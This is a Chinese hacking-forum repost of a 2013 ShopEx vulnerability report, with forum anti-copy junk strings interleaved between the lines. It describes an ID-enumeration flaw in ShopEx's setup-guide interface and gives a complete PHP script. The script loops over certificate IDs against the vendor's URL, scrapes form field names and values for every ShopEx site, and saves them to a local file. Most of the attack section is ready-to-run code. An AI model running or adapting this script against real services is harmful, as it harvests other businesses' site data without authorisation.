中国网络渗透测试联盟
标题:
ShopEx某接口缺陷可遍历所有用户网站
[打印本页]
作者:
admin
时间:
2013-9-21 15:59
标题:
ShopEx某接口缺陷可遍历所有用户网站
简要描述:
" H4 F9 Y1 Q: V9 p$ f
ShopEx某接口缺陷,可遍历所有网站
: q1 a' S. U% B/ w3 \& h
详细说明:
, h$ t' k9 D/ D1 C: ?
问题出现在shopex 网店使用向导页面
, \# a! ^ _+ e, ~( G; b
" z' L* B& c) h: z
8 ^9 U2 {& A8 q3 d& [
0 F( U1 z7 Y/ E
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
/ s1 n4 y6 ?# {7 q' J% t; \! Y5 Z
7 _% S( y" U: Y+ y8 H6 w8 D
& @2 R) y# V/ E' [# K8 L2 u
- D4 e O v/ X; [+ L8 a
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
) u8 X; I+ A( W% G5 J2 l q
# ?* L8 n$ T) I" [
7 V/ N! _( L: _: g0 Z7 z5 J9 w; s! ~ f
1 w- u5 Z* ]3 K
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
9 o7 g* b! T# {4 z/ @- }
' r' X- z" C: F9 X& x* F1 F
; a6 r# x0 l; E4 N Z" |
5 H6 a! x$ h* F4 ^* X+ l
<?php
/ Y$ f$ m8 a9 T G
: C- N6 z3 l }* W# [# l4 F* r
for ($i=1; $i < 10000; $i++) { //遍历
1 g$ s I8 T, T8 j. Q+ `
* \2 q( f; A V6 [, F
ShowshopExD($i);
v+ q: ~5 q+ `. `( n$ S
& K9 Z8 J v2 f
}
" j2 c0 P! _1 G6 P+ Q
5 S3 Z$ j: n6 A9 v5 J1 S2 o
function ShowshopExD($cid) {
! w. _' v, D) c
! R* ~8 K: k7 u% t
$url='http://guide.ecos.shopex.cn/step2.php';
- K. ?% Q" I3 Q/ m; Z+ w" `( z% I
' y& V! P/ I- P9 {0 p
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
5 C. a# c: c; P2 ]" e
, [4 U4 w, z2 ]* a1 n
$url = $url.'?refer='.$refer;
7 V- o. z7 d, s* D( R9 D2 [
D4 H* L9 w* n+ w
$ch = curl_init($url);
# t1 h/ V1 l% W: w. E- l
) [# F# `0 T, N1 b1 |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
, Q/ q3 \6 w& L# y
; g+ ^, i; v! K a% C9 P
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
/ b; x/ }) Z6 h: w+ r
( Y) j# h) Y+ F- b; d+ ^- h% N
$result = curl_exec($ch);
! Q' g! s- d% P8 g* T4 J: Z4 Y
; i$ n* O* m) J7 s. Z
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
# E9 K& n: Z: ]( K: k& u
+ f* c4 W Y1 D; `1 q' F
if(strpos($result,$refer))
# h' j C& Z8 g# F- C
; e) ]5 a- ?/ k$ r1 O/ U6 I
{
. J) h2 `6 w+ _9 G0 j' K0 Z
3 s$ B( W! }) Y8 D/ E
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件
4 E) D+ U% z! X7 J# w
8 A' W5 M; D0 i5 \6 S
preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
$ f0 T/ J1 q2 _$ b$ V
- V. c5 {0 U' R0 c9 d
foreach ($value[1] as $key) {
) @9 }6 N" w7 K" z
- S- w5 h: B; b! L$ i( W/ _
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
# O* n( a/ W0 O
+ @3 y* _ ^; G6 `0 ^3 l2 e
echo $res[1][0].':'.$res[3][0]."\r\n";
2 n$ W8 r" f ]
; F& C# O, G6 n' I" ^: q* E
$col =$res[1][0].':'.$res[3][0]."\r\n";
( m# H* f2 \6 M
/ H: t. t. C, V* m o
fwrite($fp, $col, strlen($col));
: J/ k+ f6 T4 d% ^
% B9 L8 `) P/ d7 t
}
$ j9 I- r7 J8 B3 k( x
# R* t6 M& Q7 ]( u' E$ o
echo '--------------------------------'."\r\n";
6 }' @9 S9 H; X' y. `) f
( V' X/ M# Y5 N
fclose($fp);
l; n0 P4 _" {7 ~8 X9 g
% Y3 G+ |0 x5 o$ J
}
' j* s$ U" B E+ T: z$ ~' y
! ^! C& O+ q9 B$ ~
flush();
0 P8 i" S, }4 y- M; P2 u: `
7 U& w) X" p6 k" F/ [
curl_close($ch);
6 c& @& ~& B# o: Z3 A
0 s, w9 [3 y L
}
% `- H5 r. X& S1 x3 \
* G5 ~- T! b% G* S3 u2 E
?>
- A' n6 P: K# H" s& b6 c
漏洞证明:
' @ t0 s( u- j; V
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
! c# p: O% @/ Y* n9 d. r& D
refer换成其他加密方式
( r |' ~6 P% [# o- g
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2